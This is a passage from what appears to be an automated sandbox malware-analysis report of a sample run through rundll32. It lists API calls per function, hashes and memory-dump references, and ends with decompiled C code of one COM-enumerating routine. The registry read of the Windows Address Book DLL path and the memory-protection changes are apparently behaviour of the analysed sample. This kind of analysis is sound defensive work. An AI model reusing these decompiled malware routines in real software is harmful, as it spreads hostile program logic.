                            • memcpy.NTDLL(00000000,?,?), ref: 04F7E409
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F7E41A
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F7E42F
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04F7E467
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                            • String ID:
                            • API String ID: 2349942465-0
                            • Opcode ID: d7713e2802a3fe7eac954d84b1a6196acd27691baf53b38ab7ef03304b1651a3
                            • Instruction ID: 0f4190a94d153b7f5b7e3adab92a037b386a3e92ecb518868902a48bf4221c95
                            • Opcode Fuzzy Hash: d7713e2802a3fe7eac954d84b1a6196acd27691baf53b38ab7ef03304b1651a3
                            • Instruction Fuzzy Hash: F411E576941215AFD7106F24FC48C3B7BA9EB85325701416FF9169B210D63EAC069BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F74D17 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(04F6C1F8,00000000,00000000,00000000,?,04F70FD9,?,04F6C1F8,00000000), ref: 04F74D2D
                            • lstrlen.KERNEL32(?,?,04F70FD9,?,04F6C1F8,00000000), ref: 04F74D34
                            • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 04F74D42
                              • Part of subcall function 04F6EEF2: GetLocalTime.KERNEL32(?,?,?,?,04F7FC9E,00000000,00000001), ref: 04F6EEFC
                              • Part of subcall function 04F6EEF2: wsprintfA.USER32 ref: 04F6EF2F
                            • wsprintfA.USER32 ref: 04F74D64
                              • Part of subcall function 04F6ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,04F74D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04F6ED66
                              • Part of subcall function 04F6ED48: wsprintfA.USER32 ref: 04F6ED8B
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04F74D95
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                            • String ID:
                            • API String ID: 3847261958-0
                            • Opcode ID: 1b6920b283cc277ee76b88000f8a85e210db7826aa2143b9efc0892cfe9c2d14
                            • Instruction ID: 29e6f16d4c2a3e905dad51f2439f16f877bd48be2d65cd4bdc5a3e71721cbe62
                            • Opcode Fuzzy Hash: 1b6920b283cc277ee76b88000f8a85e210db7826aa2143b9efc0892cfe9c2d14
                            • Instruction Fuzzy Hash: DC018436600218FFDB111F25EC44DBA7F6DEF84364F048026FD199A211D63AAD16DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7DCF6 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD35
                            • ResetEvent.KERNEL32(?,?,04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD3A
                            • GetLastError.KERNEL32(04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD55
                            • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD84
                              • Part of subcall function 04F6D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?,?,00000000), ref: 04F6D435
                              • Part of subcall function 04F6D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?), ref: 04F6D493
                              • Part of subcall function 04F6D429: lstrcpy.KERNEL32(00000000,00000000), ref: 04F6D4A3
                            • SetEvent.KERNEL32(?,04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD76
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 1449191863-0
                            • Opcode ID: e0df420898593117de50431356777d46f129d378762ab49cdb5b4a3748cf3b2a
                            • Instruction ID: 751ae4d1280a21977441ab4fe94e18411138d93b4353f0e1f837d69ac0f80514
                            • Opcode Fuzzy Hash: e0df420898593117de50431356777d46f129d378762ab49cdb5b4a3748cf3b2a
                            • Instruction Fuzzy Hash: 4411A57110050AAFDF216F64EC44EAB3BB9EF08374F508626F915950A0C739FC62DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F80A9D Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 04F80AB4
                              • Part of subcall function 04F7EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7EC20
                              • Part of subcall function 04F7EC09: SetEvent.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7EC30
                            • lstrlen.KERNEL32(?,?,?,?,?,04F6859B,?,?), ref: 04F80AD7
                            • lstrlen.KERNEL32(?,?,?,?,04F6859B,?,?), ref: 04F80AE1
                            • memcpy.NTDLL(?,?,00004000,?,?,04F6859B,?,?), ref: 04F80AF2
                            • HeapFree.KERNEL32(00000000,?,?,?,?,04F6859B,?,?), ref: 04F80B14
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 442095154-0
                            • Opcode ID: 777f820c92f402f4835e3b32b78f73d71899333a0ceae50a537848f14de5eaa0
                            • Instruction ID: 39b0fde1baf293f1049b0987c0db99cab996e538a90139febba36c9dea6b176f
                            • Opcode Fuzzy Hash: 777f820c92f402f4835e3b32b78f73d71899333a0ceae50a537848f14de5eaa0
                            • Instruction Fuzzy Hash: AE11A575A00209FFDB11AF55EC44E5E7BB9EB85354F214069E805EB210EB35ED05DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F77A3E Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F6AE7C: lstrlen.KERNEL32(04F6E448,00000000,00000000,?,?,04F77A5B,?,?,?,?,04F6E448,?), ref: 04F6AE8B
                              • Part of subcall function 04F6AE7C: mbstowcs.NTDLL ref: 04F6AEA7
                            • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,04F6E448,?), ref: 04F77A6A
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F77A7C
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,04F6E448,?), ref: 04F77A99
                            • lstrlenW.KERNEL32(00000000,?,?,04F6E448,?), ref: 04F77AA5
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F6E448,?), ref: 04F77AB9
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                            • String ID:
                            • API String ID: 3403466626-0
                            • Opcode ID: d6456a01c5fc226de72186e62b7e10c88ba1ebaed4a2512fb71fbe848219dd7c
                            • Instruction ID: e9be2d8060fb42a8020bde68cce3c76e286131f94310a80a28226802d07ea289
                            • Opcode Fuzzy Hash: d6456a01c5fc226de72186e62b7e10c88ba1ebaed4a2512fb71fbe848219dd7c
                            • Instruction Fuzzy Hash: 5A014C76601209BFD7119F98FC84FAA77ECEF49314F00405AFA05AF160C779AD059BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6F49F Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32 ref: 04F6F4BF
                            • GetModuleHandleA.KERNEL32 ref: 04F6F4CD
                            • LoadLibraryExW.KERNEL32(?,?,?), ref: 04F6F4DA
                            • GetModuleHandleA.KERNEL32 ref: 04F6F4F1
                            • GetModuleHandleA.KERNEL32 ref: 04F6F4FD
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModule$LibraryLoad
                            • String ID:
                            • API String ID: 1178273743-0
                            • Opcode ID: 2494522b9ec3506beea85fd6307a0d74ff9b7e42b16a59e2dc133aa9e256e707
                            • Instruction ID: d64823dca3388eaf220423196c18e9a908b9ab4f3f438024bc2c593eb67ef3a5
                            • Opcode Fuzzy Hash: 2494522b9ec3506beea85fd6307a0d74ff9b7e42b16a59e2dc133aa9e256e707
                            • Instruction Fuzzy Hash: 66016D71A0020AABDF055F69FC40D7A3BA9EF44261704003AED15C6121DBB5EC229BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7BDC6 Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,04F6396C), ref: 04F7BDCC
                            • StrTrimA.SHLWAPI(00000001,?,?,04F6396C), ref: 04F7BDEF
                            • StrTrimA.SHLWAPI(00000000,?,?,04F6396C), ref: 04F7BDFE
                            • _strupr.NTDLL ref: 04F7BE01
                            • lstrlen.KERNEL32(00000000,04F6396C), ref: 04F7BE09
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Trim$_struprlstrlen
                            • String ID:
                            • API String ID: 2280331511-0
                            • Opcode ID: 4ad218e498579cd2083a563cc831a186bde05f75cc27d950f9088d2e43c10604
                            • Instruction ID: 60ee99db03f365f64de8aff0375f4385498ef306bdca2e27aeba67876e3f97a7
                            • Opcode Fuzzy Hash: 4ad218e498579cd2083a563cc831a186bde05f75cc27d950f9088d2e43c10604
                            • Instruction Fuzzy Hash: D3F012B1700519AFE715AB64FC88E7B37ECEB46655B14405EF505CF240DF6CAC028761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F81659 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F81664
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F81675
                            • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,04F74B8B,?,?,04F8A428,04F625BA,00000003), ref: 04F8168C
                            • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,04F74B8B,?,?,04F8A428,04F625BA,00000003), ref: 04F816A6
                            • GetLastError.KERNEL32(?,?,04F74B8B,?,?,04F8A428,04F625BA,00000003), ref: 04F816B3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                            • String ID:
                            • API String ID: 653387826-0
                            • Opcode ID: a14f1946f6054853e8233b14e2732298e6351a2a96d92dc27f4f53cb0893ac05
                            • Instruction ID: 3f592d86e057cefc75a5be5ed74824380d9b0272b24ab0d0d9099d3686806fad
                            • Opcode Fuzzy Hash: a14f1946f6054853e8233b14e2732298e6351a2a96d92dc27f4f53cb0893ac05
                            • Instruction Fuzzy Hash: 3B018F75600609AFD7209F24DD04D6AB7B9FF84720B24411DEA569B690D774FD029F60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F70818 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F72397,?), ref: 04F70820
                            • GetVersion.KERNEL32 ref: 04F7082F
                            • GetCurrentProcessId.KERNEL32 ref: 04F7084B
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04F70868
                            • GetLastError.KERNEL32 ref: 04F70887
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                            • String ID:
                            • API String ID: 2270775618-0
                            • Opcode ID: e5a48a142f993d9d52850de0c420fe285f8f8931cfebeca77cc88685aa88a169
                            • Instruction ID: b96d5a4e55a9c9c8f324bfbfe189fff4d8909aa23adac986e3c88ef4b5099a15
                            • Opcode Fuzzy Hash: e5a48a142f993d9d52850de0c420fe285f8f8931cfebeca77cc88685aa88a169
                            • Instruction Fuzzy Hash: 16F04F70E5070AAFE7259F64B81AB353B61EB04B49F54011FE646CE1C0EB7CA852CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F689EE Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 04F689FB
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 04F68A0B
                            • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 04F68A14
                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,04F72F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 04F68A32
                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,04F72F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 04F68A3F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                            • String ID:
                            • API String ID: 3667519916-0
                            • Opcode ID: 877ab10e9dad8c2475820efcd96b03e67d07e99e4aa0b3e7fe96f605c98422a3
                            • Instruction ID: da84a7f8268d761e90c97423d850c3d2abbc201668f36622c44b637518f3c2b0
                            • Opcode Fuzzy Hash: 877ab10e9dad8c2475820efcd96b03e67d07e99e4aa0b3e7fe96f605c98422a3
                            • Instruction Fuzzy Hash: ECF03A71601705BFEB206A65EC48B2AB6A8EF44795F10462DF982A6590CB28FC06CA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7C484 Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 04F7C4A8
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • wsprintfA.USER32 ref: 04F7C4D9
                              • Part of subcall function 04F6AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,04F6A1A1), ref: 04F6AAC5
                              • Part of subcall function 04F6AAAF: wsprintfA.USER32 ref: 04F6AAED
                              • Part of subcall function 04F6AAAF: lstrlen.KERNEL32(?), ref: 04F6AAFC
                              • Part of subcall function 04F6AAAF: wsprintfA.USER32 ref: 04F6AB3C
                              • Part of subcall function 04F6AAAF: wsprintfA.USER32 ref: 04F6AB71
                              • Part of subcall function 04F6AAAF: memcpy.NTDLL(00000000,?,?), ref: 04F6AB7E
                              • Part of subcall function 04F6AAAF: memcpy.NTDLL(00000008,04F853E8,00000002,00000000,?,?), ref: 04F6AB93
                              • Part of subcall function 04F6AAAF: wsprintfA.USER32 ref: 04F6ABB6
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04F7C54E
                              • Part of subcall function 04F82968: RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F8297E
                              • Part of subcall function 04F82968: RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F82999
                            • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 04F7C538
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 04F7C544
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                            • String ID:
                            • API String ID: 3553201432-0
                            • Opcode ID: a84b0418cb3ace7ffcff3584f8d5d8e0d4c415bea3c703c03b10291d2c055354
                            • Instruction ID: 55e3926c25929aba39c08142afab25121258b84f68ad5e109a7234262ad874d4
                            • Opcode Fuzzy Hash: a84b0418cb3ace7ffcff3584f8d5d8e0d4c415bea3c703c03b10291d2c055354
                            • Instruction Fuzzy Hash: AD21D8B690014DAFCF11DF99ED84CAF7FB9FB48300B00441AF915AA111E775AA25EBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6EF5F Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON
                            Download Yara Rule
                            APIs
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6EFBC
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6EFCD
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6EFE5
                            • CloseHandle.KERNEL32(?), ref: 04F6EFFF
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6F014
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap$CloseHandle
                            • String ID:
                            • API String ID: 1910495013-0
                            • Opcode ID: 8c63f655cc47a216f99b01f47510066b68ba94c89e5f2054432791bedbcc8971
                            • Instruction ID: 583a321848dd34a8a5aa4a9be4cd79b248784ef981b68ef920dfb0c5cea0a2e5
                            • Opcode Fuzzy Hash: 8c63f655cc47a216f99b01f47510066b68ba94c89e5f2054432791bedbcc8971
                            • Instruction Fuzzy Hash: 31212976A01525AFC6219F65EC88C2AFBAAFF49B103540419F40AD7654C735FCA2DBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F796EE Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F6EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 04F6EC1B
                              • Part of subcall function 04F6EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 04F6EC69
                              • Part of subcall function 04F6EC00: GetProcAddress.KERNEL32(00000000,?), ref: 04F6EC82
                              • Part of subcall function 04F6EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 04F6ECD3
                            • GetLastError.KERNEL32(?,?,00000001), ref: 04F7987C
                            • FreeLibrary.KERNEL32(?,?,00000001), ref: 04F798E4
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                            • String ID:
                            • API String ID: 1730969706-0
                            • Opcode ID: b631769d3086ebefa9175065f5d4a8ebdc59acec7726eaf5023021d390d84462
                            • Instruction ID: fac962b6f897f862a2b217f56f657f58c2c4a4773955b6b68b3e1eca026ee9b4
                            • Opcode Fuzzy Hash: b631769d3086ebefa9175065f5d4a8ebdc59acec7726eaf5023021d390d84462
                            • Instruction Fuzzy Hash: 5E711AB5D00209EFDF00DFE4C884DAEBBB9FF48314B54856AE516AB250D779A942CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A15B9D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(?), ref: 04A15BD8
                            • SysFreeString.OLEAUT32(00000000), ref: 04A15CBD
                              • Part of subcall function 04A12732: SysAllocString.OLEAUT32(04A19290), ref: 04A12782
                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 04A15D10
                            • SysFreeString.OLEAUT32(00000000), ref: 04A15D1F
                              • Part of subcall function 04A13A62: Sleep.KERNEL32(000001F4), ref: 04A13AAA
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                            • String ID:
                            • API String ID: 3193056040-0
                            • Opcode ID: 53a10e1d33c373dfcb9370be0a1fc1e0c1e4792ca819d31cc96fdf3d2b8ca1e0
                            • Instruction ID: 09b7b9ecf157f36a34c0dcad470eb403383ffc52276e27d0b50d77ca0bcabba5
                            • Opcode Fuzzy Hash: 53a10e1d33c373dfcb9370be0a1fc1e0c1e4792ca819d31cc96fdf3d2b8ca1e0
                            • Instruction Fuzzy Hash: 29513C76900649BFDB01CFA8C844A9EB7BAFFC8744F158429E905DB220EB75ED06CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A12732 Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 46%
                            			E04A12732(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4a1a348; // 0xb1d5a8
					_t5 = _t103 + 0x4a1b038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4a19290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4a1a348; // 0xb1d5a8
												_t28 = _t109 + 0x4a1b0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4a1a348; // 0xb1d5a8
														_t33 = _t79 + 0x4a1b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                            0x04a12737
                            0x04a12740
                            0x04a12741
                            0x04a12745
                            0x04a1274b
                            0x04a12751
                            0x04a1275a
                            0x04a12760
                            0x04a1276a
                            0x04a1276c
                            0x04a12772
                            0x04a12777
                            0x04a12782
                            0x04a12788
                            0x04a1278d
                            0x04a128af
                            0x04a12793
                            0x04a12793
                            0x04a127a0
                            0x04a127a6
                            0x04a127ac
                            0x04a127b0
                            0x04a127b6
                            0x04a127c3
                            0x04a127c7
                            0x04a127cd
                            0x04a127d0
                            0x04a127d8
                            0x04a127d9
                            0x04a127dd
                            0x04a127e1
                            0x04a127e4
                            0x04a127e7
                            0x04a127ed
                            0x04a127f6
                            0x04a127fc
                            0x04a127fd
                            0x04a12800
                            0x04a12801
                            0x04a12802
                            0x04a1280a
                            0x04a1280b
                            0x04a1280c
                            0x04a1280e
                            0x04a12812
                            0x04a12816
                            0x00000000
                            0x00000000
                            0x04a1281c
                            0x04a12825
                            0x04a1282b
                            0x04a12835
                            0x04a12839
                            0x04a1283b
                            0x04a12848
                            0x04a1284c
                            0x04a12854
                            0x04a12859
                            0x04a1286b
                            0x04a1286d
                            0x04a12873
                            0x04a12873
                            0x04a1287c
                            0x04a1287c
                            0x04a1287e
                            0x04a12884
                            0x04a12884
                            0x04a12887
                            0x04a1288d
                            0x04a12890
                            0x04a12899
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a12899
                            0x04a127ed
                            0x04a127e7
                            0x04a127d0
                            0x04a1289f
                            0x04a1289f
                            0x04a128a5
                            0x04a128a5
                            0x04a128ab
                            0x04a128ab
                            0x04a128b4
                            0x04a128ba
                            0x04a128ba
                            0x04a12777
                            0x04a128c3

                            APIs
                            • SysAllocString.OLEAUT32(04A19290), ref: 04A12782
                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04A12863
                            • SysFreeString.OLEAUT32(00000000), ref: 04A1287C
                            • SysFreeString.OLEAUT32(?), ref: 04A128AB
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
